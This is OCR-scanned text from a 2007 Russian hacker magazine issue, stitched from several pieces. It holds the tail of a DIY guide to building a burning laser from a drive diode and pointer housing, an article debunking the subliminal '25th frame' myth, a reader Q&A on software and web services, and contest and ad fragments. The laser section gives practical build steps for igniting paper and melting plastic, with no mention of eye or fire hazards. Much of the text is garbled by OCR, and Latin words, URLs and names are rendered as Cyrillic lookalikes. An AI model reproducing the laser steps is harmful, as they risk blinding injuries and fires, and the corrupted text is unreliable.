Спокойно. Помнишь, мы выкорчевывали линзу из головки? 
Она-то и будет фокусировать нам лазерный луч. Линзу в 
процессе работы нужно закрепить как можно ближе к диоду, 
максимально выровняв ее по центру. Крепеж линзы удобно 
сделать из обычной бельевой прищепки. 

Проделав все вышеописанные операции, можно приступать 
киграм с огнем. Температуру в точке фокусировки мнеточно 
замерить не удалось, но ее хватало, чтобы в течение секунды 
загоралась спичка и плавился пластик. Но учти, что излучение 
лазера эффективно поглощается только темным (желательно 
черным) материалом. Потому лучше резать черную бумагу и 
темный пластик. 

Но есть одно маленькое но. В процессе работы выходная 
лазерная линза у меня расплавилась. Она сделана из пластика. 
Если ты посмотришь на останки головки, то увидишьтам другую 
линзу, ноуже сделанную из стекла. В большинстве случаев 
можно использовать ее. Все, после серии экспериментов™ 
получаешь настоящий лазер, которым ты можешьудивить 
друзей и подруг. 

г КОСМЕТИЧЕСКАЯ ЧАСТЬ 

Если хочется смастерить девайс посерьезнее, чем куча 
проводов на столе, то имеет смысл обратиться к конструкции 
лазерной указки. Там есть все, что нам необходимо: корпус, 
линза, отсекдля батареек. Нужно разобрать лазерную 
указку и вместо штатного слабенького диода впаять нашего 
лазерного монстра. Свинчиваем все обратно и тестируем. 
Получили карманный лазер сумасшедшей мощности. Когда 
я искал в Гугле инфу про лазеры, то натыкался на такой 
промышленный девайс стоимостью 2к грина, а тутты его 
имеешь бесплатно! 

г итог 

Воттак из подручных средств мы и получили лазер. Причем 
не просто детскую игрушку, а настоящий мощный лазер, 
которому по силам прорезать пластик и поджечь бумагу или 
спичку. Всегда помни, что для создания крутого девайса 
тебе не нужно дорогостоящее и дефицитное оборудование. 
Все необходимые компоненты давно лежат в твоем шкафу, 
главное — уметь их искать и применять :). Удачи, фрикер. ЗС 
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25-му кадру придписываются магические свойства мощного психического воздейст- 
вия на подсознание, позволяющие управлять человеком вплоть до полного зомбирова- 
ния. Народ паникует, и власти некоторых стран запрещают его использование аж на 
законодательном уровне (причем прецеденты приостановки лицензий на телевещание 
уже имеются). На самом деле ничего загадочного в 25-м кадре нет, и при желании его 
можно не только дизассемблировать, но и даже сконструировать своими собственны- 
ми руками, чем мы сейчас и займемся. 

^ і о А ХАКЕР 10 /106/ 07 



ИССЛЕДУЕМ МИФ, ВОПЛОЩЕННЫЙ в реальность 











■ чем ассоциируется «эффект25-го кадра» проще всего выяс- 
нить с помощью поисковых машин, без устали индексирующих 
Всемирную паутину. Заходим в боодіе, набираем «25 кадр» и 
говорим ЗеагсЬ. Ага! Реклама курсов английского языка, ле- 
чение алкоголизма, снятие порчи, предложение вернуть сбежавшую жену... 
Люди, не разбирающиеся ни в психологии восприятия, ни в принципах 
записи/воспроизведения/трансляции видеоизображения, ведутся на эту 
чушь, даже не задумываясь отом, чтобы ее проверить. 

Опровергать байки всегда сложно, особенно если техника воздействия 
строго засекречена, и защитникам 25-го кадра ничего не стоитсписать 
отрицательный результат на кривые руки экспериментатора. Дескать, 
если у вас не получается приготовить напалм из газолина и заморожен- 
ного апельсинового сока, отсюда еще не следует, что Тайлер — человеке 
чрезмерно развитым воображением, а Ча к Пала ни к — не гений, а рядовой 
фантаст, позабывший школьный курс химии. 

Но мы все-таки хакеры, а не космические обезьяны. В нашем распоряже- 
нии есть мощный аналитический инструмент (хвост) и хранилище бесцен- 
ныхзнаний (интернет). Объединив два ингредиента воедино, мы получим 
алхимический сплав, противостоящий магическим чарам 25-го кадра. 

■ 25-Й КАДР НАНОСИТ ОТВЕТНЫЙ УДАР 

В статьях, посвященных 25-му кадру, часто встречается утверждение, что, дескать, 
наше сознание не в состоянии воспринимать более 24-х кадров в секунду. После 
чего следуетвполне логичный вывод, что сознание вообще неспособно фиксиро- 
вать изображения, экспонируемые (то есть отображаемые) менее 1/24секунды. 
Между тем длительность фотовспышки составляет порядка 1/1000 секунды, 
и она при этом прекрасно видна. Болеетого, если втемной комнате на 
мгновение «пыхнуть», то человек не только зафиксирует световой импульс, 
но и вполне успеет рассмотреть очертания окружающих предметов, пусть и 
без деталей. Проверить это может каждый. 

1/25 секунды — это вполне «осязаемая» величина. И сейчас мыв этом убе- 
димся. Возьмем любую программу нелинейного видеомонтажа (АѴЮетих, 
ѴігіиаЮиЬ], найдем видеоролике 24 кадрами в секунду, вмонтируем 25-м 
кадром какое-нибудь изображение (женской груди, например), устано- 
вим Ірз в 25 кадров/сек и попробуем это дело проиграть в своем любимом 
видеоплеере. И что же? 25-й кадр отчетливо виден, хотя и воспринимается 
неподготовленным зрителем как косяк. 

Кстати говоря, этот прием использован (в качестве прикола) в фильме 
РідЫ: СІиЬ, где Тайлер несколько раз мелькает в ключевых сценах, что (при 
внимательном просмотре) заметно даже без предварительной наводки. 
Открыв 0Ѵй в видеоредакторе, мы сможем убедиться, что Тайлер присутст- 
вует ровно один кадр. Это составляет 1/25 секунды для РАБ и 1/30 для ЫТ5С, 
причем он появляется не каждый 25-й/ЗО-й кадр, а всего один раз, но этого 
вполне достаточно, чтобы сделать его сознательно видимым. 

Простые эксперименты показывают, что приблизительно половина людей 
без особого труда успевает прочестьзнакомые слова, экспонируемые 



1/10 секунды, а послетренировки практически каждый можетуверенно 
читать односложные фразы за 1/25 и даже 1/30 секунды! К слову, версталь- 
щики легко отличают монитор с частотой в 75 Гц от монитора с частотой в 
1 00 или 1 50 Гц, а опытные кинооператоры способны определить количество 
кадров в секунду. Кстати, для съемки спортивных мероприятий стандартных 
24 кадров в секунду катастрофически не хватает, и дискретность движения 
отмечается даже непривередливыми зрителями. Присмотрись повнима- 
тельнее, какдвижется мяч в моментудара. Правильно — рывками! 

А вотсветовые импульсы длительностью -1/100 000 сек (одна стотысяч- 
ная доля секунды) и менее сознанием уже не фиксируются, хотя глазные 
рецепторы в состоянии регистрировать даже отдельные фотоны! Возникает 
резонный вопрос: куда же девается зарегистрированная информация?! 

Она передается в мозг по зрительному нерву, где подвергается предвари- 
тельной обработке (рге-ргосевзіпд), включающей в себя втом числе и по- 
давление шумов. Слышал, как шумят цифровые матрицы? Вотиздесьто же 
самое. Природа выработала простой и надежный алгоритм: опрос соседних 
рецепторов и повторяемость сигнала. Если в течение стотысячной доли 
секунды (естественно, для всех людей эта величина разная и варьируется 
в широких пределах) сигнал не будет повторен, то он списывается на шум и 
отбраковывается, не доходя до сознания. 

Поэтому, чтобы спрятать от сознания 25-й кадр, его длительность не должна 
превышать 1/30 000 сек, иначе он будет отчетливо видимым, если, конечно, 
его можноувидеть в принципе. Например, чрезвычайно малоконтрастное 
изображение, экспонируемое продолжительное время, не будетзаметно 
вообще, ну разве что специально загрузить его в видеоредактор и тщатель- 
но изучить каждый квадратный миллиметр экрана. Воттолько смысла в 
этом нет. Какое воздействие мы ожидаем оттого, чего вообще не видим? 

ОК, демонстрируем контрастную надпись «Вложи все деньги вХѴ2» очень 
короткое время (1/30 000 — 1/60 000 сек). При этом она гарантированно 
попадетпрямо в подсознание, но будетсписана на шумы и науровне 



Реакция властей 

Официальное опровержение эффекта 25-го кадра и даже признание 
Джеймса Вайкериуже ничто не могло изменить. Время шло, маразмы 
крепчали, народ сидел на измене. Правительства некоторых стран 
запретили использование эффекта 25-го кадра на законодательном уро- 
не. В частности, закон Украины «О телевидении и радиовещании» (ст. 6, 
п. 3) так прямо и говорит: «Запрещается использование в программах 
и передачах на телевидении и радио скрытых вставок, действующих 
на подсознание человека и/или оказывающих вредное воздействие на 
состояние их здоровья». 
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Результаты поиска по запросу «ЗиЫітіпаІ Асіѵегіізіпд» («Реклама, воздей- 



Глаз фиксирует все, что в него попадает, но лишь мизерная часть информа- 



ствующая на подсознание») 



ции доходит до сознания 



сознания останется незамеченной. Ну, и что стого?! Подсознание читать 
неумеет, даже стадия распознания образов включается после подавления 
шумов, следовательно, ни о каком психовизуальном воздействии говорить 
не приходится. 

Существуеттеоретическая вероятность того, что «мозговой подавитель 
шумов» не стирает информацию из памяти окончательно, и, увидев рекламу 
повторно при нормальных обстоятельствах, наше сознание начнет разма- 
тывать цепьассоциаций, воспринимая изображение какзнакомое, хотя 
оно (сознательно) сталкивается с ним впервые. Кое-кто из «ученых» даже 
размахиваетэкспериментальными данными, якобы подтверждающими 
этот весьма сомнительный «факт», но воспроизводимостьу таких экспери- 
ментов нулевая. 

Конечно, каждый вправе верить во что угодно, но доказательств воздей- 
ствия 25-го кадра ни у кого нет. И, смею предположить, не будет никогда. 

А потому вкладывать деньги втехнологии и/или продукты, основанные на 
этом эффекте, можеттолько очень доверчивый человек. 

^ ТЕХНИЧЕСКИЕ АСПЕКТЫ ПРОБЛЕМЫ 

В кинотеатре действительно возможно «вмонтировать» 25-й кадр. Для 
этого потребуются два проектора. На одном идет нормальный фильм со 
скоростью... а вот и не угадал! Вместо 24 кадров в секунду мы видим 48, при 
этом каждый кадр экспонируется дважды в течение 1/24 секунды, и за это 
время прожектор дважды перекрывается двухлопастным обтюратором. В 
момент перекрытия светового пучка обтюратором второй проектор, синхро- 
низированный с первым, проецирует25-й кадр втечение 1/30 000 — 

1/60 000 секунды. Прожектор, конечно, придется заменить вспышкой с 
оченьхитрой схемой «поджига» и прерывания свечения. 

Теперь перейдем ктелевидению. Согласно стандартам РАБ/5ЕСАМ по 
эфиру передается 50 полукадров в секунду, точнее, даже не полукадров, а 
полей. В одних полях находятся четные строки, в других — нечетные. N150 
также работаете полями, только их количество увеличено до 60. Телецентр 
не может заставить наш телевизор отобразить более 50/60 полей 
в секунду (просто не имеет для этого технических средств), то 
есть минимальная длительность 25-го кадра составляет 1/25 сек 
для РАБ/5ЕСАМ и 1/30 для N150. Стандарт есть стандарт, против 
которого не пойдешь. А чтобы скрыть 25-й кадр от сознания, нам 
необходимо сократить время экспонирования хотя бы до 1/30 000 
секунды... 



Автономные ОѴО-плееры также придерживаются стандарта, а вот на ком- 
пьютере можно задать любую частоту воспроизведения видеоклипа, благо 
практически все кодеки это позволяют. Получить 30 000 или даже 
60 000 кадров в секунду вполне реально (только для этого потребуется со- 
брать целый кластер). С такой скоростью изображение будетзаписываться 
в видеопамять. А вотс какой скоростью оно будет выводиться на экран? Ну 
СРТ-мониторы мы отбросим сразу. У них послесвечение люминофора на- 
много превышает 1/30 000 сек (точную величину можно найти в специфика- 
ции на трубку). Более того, за такое время электронный луч просто не успеет 
оббежать весьэкран! 1_С0-мониторы не имеют бегающего луча, и матрица 
пикселей теоретически могла бы менять свое состояние хоть 30 000 раз в 
секунду, если бы не два но. Во-первых, жидкие кристаллы сильно тормозят, 
и время отклика в 1 -3 мс считается хорошей характеристикой для монитора. 
Во-вторых, контроллер, управляющий матрицей, работает в построченном 
режиме (ну не совсем в построченном, экран обычно разбит на 4 независи- 
мые зоны), так что минимальная длительность экспонирования изображе- 
ния в лучшем случае составляет 1/100 секунды. 

Таким образом, на бытовом оборудовании получить эффект25-го кадра 
невозможно в принципе! Но приверженцевтехнологий манипулирования 



Известный случай 
использования 
25-го кадра 

В 1982 году в Штатах была выпущена серия видеокассет, якобы 
содержащая 25-е кадры с надписью «Не воруй», после чего количе- 
ство краж в магазинах сократилась аж на 50% Г еагеіа. аіі. ги /опИпе / 
1опе1іѵег/32/11 011 . Интересно, почему же столь эффективная техника 
не была взята на вооружение другими магазинами? Действительно, 
зачем тратиться на дорогостоящие камеры видеонаблюдения, клеить 
магнитные стикеры, нанимать секьюрити... 
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подсознанием это ничуть не смущаети нисколько не останавливает. Они 
просто берут каждый 50-й полукадр, состоящий из четных строк, и замеща- 
ютего «рекламным» кадром (в кавычках, потому что условно рекламный; 
может быть любого содержания, в зависимости отцелей манипулирова- 
ния), в результате чего четные строки «рекламного» кадра перемешива- 
ются с нечетными строками настоящего кадра, как бы растворяясь в нем, 
и «рекламный» кадр действительно не воспринимается сознанием. Но, 
вообще-то, и подсознанием он не воспринимается тоже. Понять, что же 
там все-таки изображено, можно, только загрузив изображение в редактор 
и удалив все нечетные строки. Надеяться, что такая реклама поднимет 
продажи, — наивно. И английскийтакне выучить. 

X КАК ВСЕ БЫЛО НА САМОМ ДЕЛЕ 

Людям нравятся тайны, окутанные мраком, и они находяттысячу предло- 
гов, чтобы не взять в руки фонарик, не зажечь прожектор, наконец, просто 
не дождаться дня, потому что при свете все выглядитскучным и неинтерес- 
ным. Реальные факты навеваюттоску. Зачем ворошить историю, рыться в 
архивах, если можно сослаться на несуществующие секретные лаборато- 
рии и ошеломляющие исследования, которые никогда в действительности 
не проводились? 

История «открытия» 25-го кадра, в общем-то, банальна. В 1 957 году 
Джеймс Вайкери, до этого не слишком удачный консультант по рекламе, 
заявил, что провел необычный эксперимент. По его словам, в одном из 
кинотеатров Нью-Джерси было установлено специальное оборудова- 
ние, демонстрирующее скрытую рекламу с надписью: «Огіпк Соке, Еаі 
Рорсогп». Во время закрытия основного проектора обтюратором, второй 
проектор отображал рекламные кадры в течение 1/3000 секунды так, что 
никто не успевал их заметить, однако кривая продаж колы и попкорна по- 
высилась на 17% и 50% (по другим данным, на 18,1% и 57,5%). Чем вызван 
такой разрыв между кокой и попкорном, Вайкери так и не объяснил, вместо 
этого он предложил рекламодателям изящный способ сокращения расхо- 
дов. Действительно, чем короче время показа рекламы, тем дешевле она 
обходится, а если еще и зритель не отвлекается от просмотра фильма (кого 
из нас не раздражает реклама?), то это вообще хорошо! 

Ни о каком манипулировании подсознанием Вайкери не говорил, он «про- 
сто» предлагал альтернативный способ демонстрации рекламы, имею- 
щий отдачу, сопоставимую страдиционными рекламными блоками (или, 
во всяком случае, не худшую). Идея манипулирования пришла в голову 
журналисту по имени Норман Казинис, опубликовавшему в Баіигсіау Реѵіеѵѵ 
статью, в которой высказывалось предположение, что 25-й кадр можно 
использовать нетолько в рекламе, но и для скрытой пропаганды различ- 
ных идей. Что именно это за идеи, объяснил народу его коллега по цеху 
— публицист Брайан Ки, утверждающий, что 25-й кадр работает не только 
на телевидении, но и... даже на фотографиях! Причем, по его мнению, эта 
методика уже давно используется не только рекламными агентствами, но и 
правительством! Интересно, где он такую траву брал?! 

Ладно, оставим этихумников и вернемся ктоварищу Джеймсу Вайкери, 
который доил доверчивых клиентов, лихорадочно подсчитывая бабки (по 
некоторым данным что-то около 20 миллионов), но кайф скоро закончился, и 
наступила измена. Рекламные агентства, ученые, общественные и государ- 
ственные организации потребовали от Вайкери предоставить внятное опи- 
сание методики проведения эксперимента. А пронырливые журналисты тем 
временем ринулись на поиски загадочного кинотеатра, в котором экспери- 
ментякобы был проведен, но, увы, во всем Нью-Джерси вообще не нашлось 
кинотеатра, который удовлетворял бы заявлению Вайкери, утверждающего, 
что скрытую рекламу просмотрели 50 тысяч зрителей за 6 недель. 



По методике Вайкери различными исследователями была проведена 
серия экспериментов со скрытой рекламой, однако ожидаемого эффекта 
она так и не произвела. В июне 1 958 года Американская психологическая 
ассоциация официально опровергла эффект25-го кадра, а в 1962 году 
Вайкери признался, что его экспериментбыл изначально сфабрикован 
вместе со статистикой продаж, однако остановить лавину слухов, сплетен и 
страхов перед магическим 25-м кадром было уже невозможно. Более того, 
сотни шулеров по всему мируувидели в нем прекрасную возможность для 
обогащения. 

Кстати говоря, термин «25-й кадр» исключительно российского происхож- 
дения. На Западе принято говоритьотакназываемой «сублиминальной» 
(зиЫітіпаІ.то есть «находящейся ниже порога сознания») рекламе. По 
запросу «ЗиЫітіпаІ Асіѵегбзіпд» старик боодіе выдает почти 2 миллиона 
ссылок! Вотэто интересу народа к чудесам! 

X ВМЕСТО ЗАКЛЮЧЕНИЯ 

Вся без исключения аудио- и видеоинформация, воспринимаемая орга- 
нами чувств, в той или иной мере воздействует на подсознание. Степень 
скрытости вставки может варьироваться в очень широких пределах: от 
«тупого» вмонтирования кадра с надписью «Сиди смотри только АТН» 

(за демонстрацию которого Екатеринбургская телекомпания лишилась 
лицензии на 2 месяца) до использования реально работающих методик, 
основанных на знании психологии восприятия (пример с негром и мойкой 
мы уже разбирали в предыдущей статье рубрики Рзусбо). 

Мы же можем обнаружить лишь «тупые» (то есть совершенно никак не 
работающие) попытки манипуляции подсознанием, типа различных 
надписей или фигур, различимыхтолько при покадровом просмотре или 
же воспринимаемых зрителем как досадная помеха или глюк (с учетом 
времени послесвечения кинескопа совершенно нереально вмонтировать 
контрастную надпись длительностью более одного полукадра, или же это 
должна быть слишком мелкая либо, наоборот, крупная надпись, располо- 
женная вне центра внимания зрителя). 

Хитрые вставки обнаруживаются только при тщательном анализе изобра- 
жения бригадой искусствоведов, психологов, фотографов, киноопера- 
торов, специалистов по рекламе, но даже они не имеют стопроцентного 
шанса на успех. Болеетого, даже если они обнаружат и доказательно обос- 
нуют, что изображение (и/или видеоряд) содержит скрытый подтекст, то 
привлечь его создателя к ответственности все равно не удастся, поскольку 
сложно отличить умысел от съемки по наитию. ~і-г 



Крик души мыщъх’а 



Мы боремся за невмешательство в свое подсознание, но совершенно не 
обращаем внимания на то, что буквально купаемся в океане сознатель- 
ной пропаганды, в результате которой возникают войны, национальные 
розни и прочие формы нетерпимости к людям, «исповедующим» иной 
образ жизни. Мы превратились в послушное общество потребителей, 
привыкших полагаться на «экспертов». Вместо того чтобы доверять 
своим собственным чувствам, мы слушаем искусствоведов и читаем 
таблички под картинами, объясняющие, почему эти картины нам долж- 
ны нравиться. Не это ли есть зомбирование? 
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РАОГаКЕМ.ХАКЕР.КЦ 

ЗАДАВАЯ ВОПРОС, ПОДУМАЙ! НЕ СТОИТ МНЕ ПОСЫЛАТЬ ВОПРОСЫ, ТАК ИЛИ ИНАЧЕ 
СВЯЗАННЫЕ С ХАКОМ/КРЯ КОМ/ФРИ КОМ, - ДЛЯ ЭТОГО ЕСТЬ НАСК-ЕАО (НАСКЕАОѲ 
РЕАЬ. ХАКЕР. К II); НЕ СТОИТ ТАКЖЕ ЗАДАВАТЬ ОТКРОВЕННО ЛАМЕРСКИЕ ВОПРОСЫ, 
ОТВЕТ НА КОТОРЫЕ ТЫ ПРИ ОПРЕДЕЛЕННОМ ЖЕЛАНИИ МОЖЕШЬ НАЙТИ И САМ. Я 
НЕТЕЛЕПАТ, ПОЭТОМУ КОНКРЕТИЗИРУЙ ВОПРОС, ПРИСЫЛАЙ КАКМОЖНО БОЛЬШЕ 
ИНФОРМАЦИИ. 



СТЕПАН «5ТЕР» ИЛЬИН 



О: Для организации своего сервиса нужно написать довольно простого 
ІСО-бота. Ничего сверхъестественного от него не требуется: просто 
отвечать на ключевые слова, отправляя нужную информацию. Плюс 
выполнение по удаленной команде (с определенного Ш Ы’а) некоторых 
действий на сервере. Подскажи, как это проще всего организовать? 

Уж больно не хочется писать все, включая реализацию ІСО-протокола 
(который к тому же постоянно меняется), с нуля. 

А: Я тоже не стал бы изобретать велосипед и обратился бы к средствам, дав- 
но проверенным временем. Например, к Мігапсіа [ ѵ\ллл/ѵ.тігапс1а-іт.ога 1. Ни 
для кого не секрет, что этот клиент получил большую популярность за счет 
своей расширяемости. Разработчики открыто распространяютЗОКдля 
написания плагинов, поэтому разработать свой собственный плагин может 
кто угодно. И без того несложную задачу можно упростить, если хорошо 
порыскать в разделе Асісіопз. Есть шанс найти исходники уже готовых ботов 
и просто переделать их под свои нужды. 

О: Говорят, что на недавно открытой станции метро в Москве проезд 
можно оплатить с помощью сотового телефона! Просто приложить его к 
турникету и все — деньги сами спишутся со счета. Что-то мне не верит- 
ся, как это вообще можно было реализовать? 

А: Не веришь, а зря! Эта услуга действительно уже доступна, нолишьдля 



ограниченного числа лиц, имеющих в своем распоряжении подходя- 
щийтелефон — Ыокіа 6131 ІЧРС. Сама технология, которая называется 
радиочастотной связью ближнего действия (Ыеаг РіеШ Соттипісаііоп, 

N РС] , была разработана уже довольно давно. Расстояние, на которое она 
способна передать данные, смехотворное — всего 10-12 см, но как раз 
достаточное для реализации подобных услуг. Для установки соединения 
между двумя устройствами вообще не требуется каких-либо усилий. Чтобы 
начать передачу данных, достаточно расположить девайсы на небольшом 
расстоянии друготдруга. Еслителефон с ЫРС-чипом поднести ктерминалу 
оплаты в магазине или на станции метро, будет начата банковская транзак- 
ция. Деньги в случае с нашим метрополитеном снимаются не с телефонного 
счета, а со специального банковского (его нужно предварительно открыть]. 
Причем стоимость проезда при этом никакие будет отличаться от стоимости 
обычного билета, покупаемого в кассах метрополитена. В случае с упомяну- 
тым телефоном ЫРС-чип встроен в сам аппарат, а какже быть с остальны- 
ми? Выход есть: монтировать миниатюрный ЫРС-чип в ЭІМ-карту, которая 
будет работать в любом телефоне, вот и все! Подобные симки появятся уже 
к 2008 году. 

Для справки: для передачи данных в ЫРС используется частота 13,56 МГц, а 
скорость связи составляет212 Кбит/с, при этом многие принципы позаим- 
ствованы из нашумевшей технологии РРЮ. 
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КОМПАНИЯ СЕННХАЙЗЕР АУДИО ОБЪЯВЛЯЕТ КОНКУРС ІѴШ5ІС АРЮШО. 

Чтобы выиграть одну из десяти отличных гарнитур ЗеппНеізег Соттипісаііопз РС 1 31 
необходимо ответить на 5 вопросов: 



1 . Какой музыкальный 
инструмент был изобретен 
раньше: скрипка или гитара? 

2. В каком году была основана 
компания ЗеппНеізег 
Соттипісаііопз? 

3. Какая звукозаписывающая 
компания первой использовала 
формат Сотрасі: Оізс? 

4. Именем какой команды 
геймеров названа одна из 
моделей гарнитур ЗеппИеізег 
Соттипісаііопз? 

5. На каком музыкальном 
инструменте впервые прозвучал 
«Реквием» Моцарта? 




ПЕРВЫЕ 10 ЧЕЛОВЕК, 

ПРИСЛАВШИХ ПРАВИЛЬНЫЕ 
ОТВЕТЫ, СТАНОВЯТСЯ 
ОБЛАДАТЕЛЯМИ КЛАССНОЙ 
ГАРНИТУРЫ ОТ ЗЕЫМНЕІЗЕВ 
СОММІИМІСАТЮЫЗ. 



□П ХЕЫІЧІНЕІІЕР 





0: Подскажите, пожалуйста, аналог ІЖІХ-зГіеІІ (тотже самый ВазН), но 
для Винды. Чтобы можно было выполнять те же самые команды, а в 
консоли была привычная подсветка файлов и т.п. Судѵѵіп не предлагать, 
так как он эмулирует работу всего ЫЫІХ, а мне нужен только зИеІІ со 
всеми возможностями. 

А: Нуеслитебе нужен просто аналог ВазЬ и набор стандартныхтулз, то проще 
всего не заморачиваться и установить в систему пакет 6ЫІІ ийІіІіезй)гѴѴіп32 
[ бНрѴ/ипхибІз.зоигсеіогае.пеІ: ). Но это только набор портированных под Вин- 
ду приложений, поэтому о какой-либо интеграции с операционной системой 
можно даже и не мечтать. Для более серьезной кооперации с ОС потребуется 
продукт посолиднее — ѴѴіпсІоѵѵз Бегѵісезіог II N IX Ѵегзіоп. Дистрибутив (200 
Мб) можно закачать с сайта ѵѵѵѵѵѵ.тісгозоіі.согп (200 Мб) или с нашего диска. 
Это специальный драйвер для ядра ѴѴіпсІоѵѵз (2к+), который не эмулирует ник- 
совые вызовы через стандартные функции ѴѴіп32 АРІ (как Судѵѵіп), а работает 
с ядром напрямую. В комплект пакета входят непосредственно драйвер, БОК 
с 6СС, службы согласования и делегирования прав между ОЫ IX- и ѴѴіпсІоѵѵз- 
сетями и, само собой, набор базовых сервисов/утилит ІІІЧІХ-зЬеЦ. Туттебе 
и зЬ, и кзб. Этот изначально коммерческий проект, предназначенный для 
сетевых администраторов, которые хотят перейти с никсов на Винду, был 
куплен МісгозоЙ и теперь распространяется совершенно бесплатно. Кстати 
говоря, на сайте разработчиков ( ѵѵѵѵѵѵ.іп^егорзѵзІіетз.сотЛооІз/ѵѵагебоизе. 
Ыт ) также бесплатно доступны дополнительные утилиты, такие какОТК+, 
ВазЬ, МС, 55Н, ОТ, АрасЬе. Но для закачки придется пройти небольшую реги- 
страцию. Помимо этого, рекомендую посмотреть проект АпсИ_іпих ( Ьйр://ѵѵікі. 
др2х.огд/уѵікі/АпсИ-іпих ). являющийся портированным ядром пингвина для 
ѴѴіпсІоѵѵз! 



0: Задача такова: поставить на небольшом сервере ѴЫС-демон, но с 
одним условием — с полным отсутствием клиентской части. Я буду 
обращаться к нему из самых различных мест и сред, поэтому это крайне 
необходимо! Как быть? КРй не пойдет, поскольку сервер, возможно, 
будет под никсами. 

А: Не вижу проблемы втом, чтобы взять ѴЫС-клиентс собой на флешке. 
Большинство реализаций не требует установки, да и в любом случае 
клиентскую часть можно портировать (читай в этом номере статью про 
портирование приложений). Впрочем, обойдемся и без клиента! Кактебе 
вариантобращения кудаленному рабочему столу прямо через браузер, не 



используя никаких других средств? Еще недавно мне показалось бы это 
бредовым, но уже сейчас есть вполне работоспособные решения. Первая 
бесклиентная реализация ѴЫС называется А)ах ѴІ\ІС ( ШрУ/зоигсеЬгае.пеІ:/ 
рго|ес1з/а]ахупс ). Послеустановки на сервере серверной части, написанной 
на Оаѵа, можно получить доступ кудаленному рабочему столу, просто набрав 
в браузере Ьир://<зегѵегір аббге55>:8086/гето1ебезк1ор.Ь1т[ . Картинка до- 
вольно шустро обновляется в реальном времени, и в этом большая заслуга 
технологии Аіах. Впрочем, это не единственный вариант реализации кли- 
ента, совсем недавно появилась бета-версия клиентской части, собранная 
на РІазЬ’е! По адресу НіІрУ/озіІазб.огаЛѵпс можно скачать зѵЛ-бинарник и 
даже исходники. 



0: Я хочу купить домен, но он все еще делегирован. Каким образом 
можно автоматизировать процесс проверки домена, а в идеале — его 
покупки, кактолько это станет возможным? 

А: Тупо проверять статус домена вручную в надежде на то, чтототосвобо- 
дился, нетолько неудобно, но еще и неэффективно. Малоопытный человек 
может попросту запутаться в многочисленных вариантах статуса и прозевать 
момент, когда домен можно было приобрести. Тогда все — пиши пропало! 
Выкрутиться из этой ситуации помогут специальные агенты, которые возь- 
мут всю работу на себя. Типичным примером является крупнейший в мире 
доменный регистратор — 6о йасісіу ( ѵѵѵѵѵѵ.досіасісіу.сот ). Помимо всех прочих 
услуг (кстати, у него одни из самых низких цен надомены всети; например, 
домен в зоне . I N Р0 можно приобрести всего за $2,99 в год), предусмотрена 
автоматическая регистрация интересующего тебя доменного имени. За 
небольшую плату Оо Баббу будет проверять, не освободился ли домен, и тут 
же зарегистрирует его на тебя в случае положительного результата. А это он 
делает быстро, ты уж поверь. Неплохая подборка всевозможных доменных 
сервисов, втом числе аукционов, собрана по этому адресу: ЬКр://тазЬаЫе. 
сот/2007/09/1 6/ботаіп-ІооІЬох . 



О: Устал от бесполезной писанины в своем блоге на ^ѵѵѵѵЛіѵеіоигпаІ.сот . 
Кроме сотен комментариев и чувства своей крутости, никакой отдачи 
от него нет. Сначала было интересно, но долго продержаться на одном 
только альтруизме нельзя. Я периодически публикую интересные 
статьи, которые потом быстро расходятся по интернету, и хотел бы полу- 
чать за это деньги. Как это можно сделать? 

А: Скажу тебе по большому секрету: свежие и актуальные материалы, 
грамотно и интересно написанные, нужны всем и всегда. Интересуешься 
высокими технологиями? Так чего же ты сразу не написал нам в «Хакер»?! 
Наши редакторы днем и ночью видятсны, когда к ним сами начнутпри- 
ходить авторы с дельными предложениями. Не бойся попробовать — все 
когда-то начинали. Впрочем, зарабатывать деньги, и даже большие деньги, 
можно, не меняя профиля и продолжая публиковать свои статьи в блогах. 
Только вотпридется играть по новым правилам (например, писать на анг- 
лийском языке), изменить площадку для размещения постов и усвоить, за 
что сейчас платят деньги. А платить готовы за следующее: 

• Собственно, за то, что ты пишешь, публикуешь посты, привлекаешь ксво- 
ему блогу массу заинтересованных пользователей (которые уже различным 
образом приносят прибыль проекту, платящемутебе). 

РауРегРозІ ( уууууу.раурегровТсот ) может добавить в твой карман от $500 в 
месяц за то, что ты будешь писать статьи и обзоры для их спонсоров в своем 
блоге. Реѵіеѵѵ Ме ( ѵѵѵѵѵѵ.геѵіеѵѵте.сот ) — если удовлетворишь ихтребова- 
ниям, будешь получать от20 до 200 баксов за каждый свой пост! 

Сгеаііѵе ѴѴеЫоддіпд ( ѵѵѵѵѵѵ.сгеаІіѵе-ѵѵеЫоддіпд.сот ) — неплохая площадка 
для тренировки, готовая платить $225 в месяц, если будешь публиковать 
7- 10 толковых постов в неделю. РаѵТіррег ( ѵѵѵѵѵѵ.баѵііррег.согп ) платит $3 за 
каждый опубликованный Ор'пЧгіскз (трюки принимаются для самых разных 
областей, начиная компьютерами и заканчивая кулинарией). На квартиру 
не заработаешь, но на безлимитный инет — вполне. 

• За размещение текстовой рекламы и переходы с нее. 

боодіе Абзепзе ( ѵѵѵѵѵѵ.доодіе.согп/абзепзе ] — самый популярный рау-рег- 
сііскспонсор отбоодіе, который платит от$0, 01 до $5,00 за кликпо реклам- 
ной ссылке. ВІодАсіз ( ѵуѵууѵ.ЫоаасІз.сот ) — спонсор, специально заточен- 
ный для блоггеров и щедро вознаграждающий их 50-5000 баксов в месяц за 
продажу рекламы. Правда, вступить в число пользователей нетак просто. 

• За участие в партнерский программах. 

Атаюп Аззосіаіез ( ЬіІр://аМіа1:е-ргодгат.агпа20п.сот ) — помогай 
продавать продукцию известнейшего инет-магазина и получай до 10% от 
стоимости проданного ствоей помощью товара. СІіскВапк ( ѵѵѵѵѵѵ.сІіскЬапк.сот ) 
продает 10 000 товаров и платит комиссию в 75% за твою помощь! 

• За участие в социальных программах. 

КпоѵѵВгаіпегз ( ѵѵѵѵѵѵ.кпоѵѵЬгаіпегз.сот ) и бизіАпзѵѵег ( ѵѵѵѵѵѵ.щзіапзѵѵег.согп ] 
— отвечай на вопросы людей из области, в которой ты спец, и получай за это 
деньги. НС 
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5М5 - и ты онлайн! 



Интернет? 



] Какже сейчас без него! Мы настолько привыкли к нон-стоп общению, оперативному поиску информации и современным онлайн приложениям, что порой просто 
не можем позволить себе остаться без Сети. Да ни за что! Нас уже давно не устраивает медленный неуверенный коннект, из-за которого можно отключиться от игры в самый 
неподходящий момент или вообще провалить вполне реальную денежную сделку. В идеале подключить свой ноутбук или карманный компьютер кѴѴі-Рі хот-споту, у которого 
